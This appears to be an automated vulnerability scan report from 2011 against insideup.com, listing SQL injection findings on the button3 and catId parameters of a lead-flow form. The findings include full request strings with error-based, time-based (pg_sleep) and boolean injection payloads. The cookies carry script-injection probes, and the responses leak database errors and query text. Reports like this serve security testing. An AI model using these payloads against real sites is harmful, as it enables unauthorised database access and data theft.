card&attributeId_529=SELECT pg_sleep(25)--'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

1.49. http://www.insideup.com/ppc/leadflow/bulo00/project.php [button3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The button3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the button3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit'&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:44:47 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit''&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:44:47 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.50. http://www.insideup.com/ppc/leadflow/bulo00/project.php [button3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The button3 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the button3 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:23:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

1.51. http://www.insideup.com/ppc/leadflow/bulo00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005'&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:41:38 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005''&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:41:38 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.52. http://www.insideup.com/ppc/leadflow/bulo00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. The payloads 14060216'%20or%201%3d1--%20 and 14060216'%20or%201%3d2--%20 were each submitted in the catId parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=3000514060216'%20or%201%3d1--%20&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:35:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4fs7cb6rdfn1gntpji2nmnrfe0; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www.insideup.com/ppc/leadflow/">
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function
...[SNIP]...

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=3000514060216'%20or%201%3d2--%20&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
